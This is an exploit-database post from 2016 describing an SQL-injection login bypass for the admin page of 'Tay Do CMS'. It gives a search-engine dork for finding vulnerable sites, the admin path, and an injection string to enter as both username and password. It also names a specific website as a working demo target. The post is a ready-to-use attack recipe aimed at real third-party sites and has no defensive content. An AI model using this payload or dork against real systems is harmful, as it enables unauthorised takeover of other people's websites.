Tay Do CMS Admin Page Bypass

2016.07.12

Credit: Street Cyber

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:"Powered by Tay Do"

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|------------------------------------------------------------------[+]
|[+] Exploit Title: Tay Do CMS Admin Page Bypass
|[+]
|[+] Exploit Author : street cyber
|[+]
|[+] Google Dork: intext:"Powered by Tay Do"
|[+]
|[+] Tested on: Windows 7
|[+]
|[+] Date : 2016/07/10
|------------------------------------------------------------------[+]
|[+]
|[+] Vulnerable File : index.php
|[+] Describe : Search dork and select Target. Put admin/index.php After url such as :
|[+] http://site.com/admin/index.php
|[+] Now enter fill Gebruikersnaam(username) and Wachtwoord(Password) like the information below :
|[+] Username: '=' 'OR'
|[+] Password: '=' 'OR'
|[+]
|[+] OK :)
|[+]
|[+] Demo :
|[+] http://xecapcuu.vn/admin
|[+]
|[+]
|----------------------------------------------------[+]
|[+] discovered by :
|[+] Sir_Mamad_Danger
|[+]
|[+] My friends :
|[+] 1- Ki@n error
|[+] and all street cyber members ...
|[+]--------------------------------------------[+]
|[+] Homepage :
|[+] http://streetcyber.com
|[+]-------------------------------------------[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Tay Do CMS Admin Page Bypass

Dork: intext:"Powered by Tay Do"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.